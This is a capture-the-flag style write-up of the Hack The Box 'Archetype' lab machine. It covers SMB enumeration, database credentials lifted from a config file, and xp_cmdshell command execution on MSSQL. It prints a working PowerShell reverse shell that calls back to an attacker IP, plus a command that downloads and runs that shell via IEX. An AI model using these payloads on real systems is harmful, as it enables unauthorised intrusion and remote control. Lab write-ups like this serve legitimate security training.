HACK THE BOX | archetype |

Today we are gonna dive into hacking, so Hack the box is popular service where aspiring hackers , penetration testers practice their skills and solve challenges . basically it’s like treasure hunt , what you need to do is hack the machines , and find two flags and submit it to succeed to the task.

Today , we are solving archetype box, this box is a starting point box (as for me ). So let’s exploit.

Basic Information

IP address : 10.10.10.27

Release date : 188 days (till today)

User owns : 27875

System owns : 28366

Machine rating : 4.0

Created by : egre55

https://app.hackthebox.eu/users/1190

https://twitter.com/egre55/

Steps will be :

1. Information gathering
2. Getting into pilot seat (getting regular user access)
3. Getting privileged User access

1. Information Gathering

So as they say , more you know about the target , more you know how to exploit them

So first we are gonna do some information gathering using NMAP, NMAP is information gathering tool which is a network mapper and it;s use to discover open ports and services. Also in security auditing.

• sudo nmap -p -T4 -sV 10.10.10.27

After running these command we found out that port no. 139, 445, and 1433 are opened. So basically i googled them to find out more about them.

• About ports 139/445:
  • https://www.upguard.com/blog/smb-port
  • https://book.hacktricks.xyz/pentesting/pentesting-smb
• About port 1433:
  • https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/configure-a-server-to-listen-on-a-specific-tcp-port?view=sql-server-ver15

So port 139 is a NetBIOS session port , port 445 runs SMB protocol and port 1433 runs SQL server. Which means this machine is talking to other machines in a network to share some files . great news for us and also it also has sql server means it has some database which will be a great opportunity to established connecting (hope so it will accept my proposal )

2. Getting regular user access

So let’s first focus on SMB. kali linux has preinstall tool call SMBMAP. Which helps us to check exposed shared resources and their permissions

• Smbmap -H 10.10.10.27 -u “ ” -p “ ”

So this command showed that there is two available shares with read access

• IPC$: this hidden share is a special share used for inter-process communication. It doesn’t allow one to access files or directories like other shares, but rather allows one to communicate with processes running on the remote system.
• backups: a normal share with read access. It lacks a comment which means it could contain interesting data if we’re able to connect to it.

Now , we will connect to “backups” using smbclient

• Smbclient //10.10.10.27/backups

There is a file called prod.dtsConfig . this is a SQL configuration file. So we have some credentials which can be used to connect to 1433. So to connect to this port msqliclient.py is used .

• mssqlclient.py ARCHETYPE/[email protected] -windows-auth

After connecting to sql server we will use IS_SERVROLEMEMBER function to find that this user is a pilot (root) or not

So this user have a root privileges . so we will use XP_CMDSHELL and we will gain RCE to host.

SQL> EXEC sp_configure ‘Show Advanced Options’, 1;

[*] INFO(ARCHETYPE): Line 185: Configuration option ‘show advanced options’ changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL> reconfigure;

SQL> sp_configure;

SQL> EXEC sp_configure ‘xp_cmdshell’, 1

[*] INFO(ARCHETYPE): Line 185: Configuration option ‘xp_cmdshell’ changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL> reconfigure;

SQL> xp_cmdshell “whoami”

Whoami will show that this user has admin privileges or now and for our favor, it has not any …

So we have to get proper pilot seat we will use powershell script to enumerate the system.

$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “# “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Now order to host the file we will start a server.

• Python3 -m http.server 80

Now to listen, we will use netcat on 443 port

• Sudo ufw allow from 10.10.10.27
• Sudo rlwrap nc -nlvp 443

Now let’s submit a command to download and execute the shell through XP_CMDSHELL

• xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString(\”http://10.10.14.3/shell.ps1\”);“

And we have a usr flag from deskop